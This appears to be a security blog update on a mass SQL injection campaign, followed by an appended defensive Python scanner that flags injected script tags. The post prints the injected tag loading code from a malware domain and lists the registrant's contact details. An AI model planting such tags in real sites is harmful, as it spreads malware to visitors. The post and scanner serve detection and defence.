We posted a few days ago about a mass SQL injection campaign that has been compromising thousands of sites. Our latest numbers show that more than 200,000 pages were infected with the nikjju.com malware.
However, over the last two days the attackers have switched domain names and are now using hgbyju.com to distribute their malware (also hosted at 18.104.22.168). The following code is now being added to the compromised web sites:
<script src = http://hgbyju.com/r.php <</script>
This domain name was registered just a few days ago (April 17) by James Northone email@example.com, the same name and email used for nikjju.com and many other domains from similar malware campaigns (probably fake):
James Northone firstname.lastname@example.org
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
So they have been at this for a while, with no sign of stopping.
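A defender-side check for the injected tag shown above, as an added example that is not part of the original post: it scans stored page content for script tags whose src host is one of the two domains named here. The function names and the sample pages are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Domains named in this post; extend the set when the campaign rotates again.
CAMPAIGN_DOMAINS = {"nikjju.com", "hgbyju.com"}

# Tolerant on purpose: the injected tag has spaces around '=', no quotes and
# no closing '>', so matching must not rely on well-formed markup.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?\s*([^\s\"'<>]+)", re.IGNORECASE)


def find_injections(html, domains=CAMPAIGN_DOMAINS):
    """Return script src URLs whose host is a campaign domain or subdomain."""
    hits = []
    for match in SCRIPT_SRC.finditer(html):
        url = match.group(1)
        try:
            host = (urlsplit(url).hostname or "").lower().rstrip(".")
        except ValueError:  # malformed authority, e.g. a broken IPv6 literal
            continue
        # Compare on label boundaries so look-alike hosts do not match.
        if any(host == d or host.endswith("." + d) for d in domains):
            hits.append(url)
    return hits


def scan(pages):
    """Map page name -> matching URLs, for pages with at least one hit."""
    report = {}
    for name, html in pages.items():
        hits = find_injections(html)
        if hits:
            report[name] = hits
    return report


# Constructed sample content (page bodies or text columns from a DB dump).
SAMPLE_PAGES = {
    "news.asp": "<p>Title<script src = http://hgbyju.com/r.php <</script></p>",
    "old.asp": '<SCRIPT SRC="http://www.nikjju.com/r.php"></SCRIPT>',
    "clean.asp": '<script src="/js/site.js"></script>'
                 '<script src="http://nothgbyju.com/a.js"></script>',
}

if __name__ == "__main__":
    for page, urls in scan(SAMPLE_PAGES).items():
        print(page, urls)
```

Because the campaign writes the tag into database fields, the same function can be run over exported text columns as well as rendered pages.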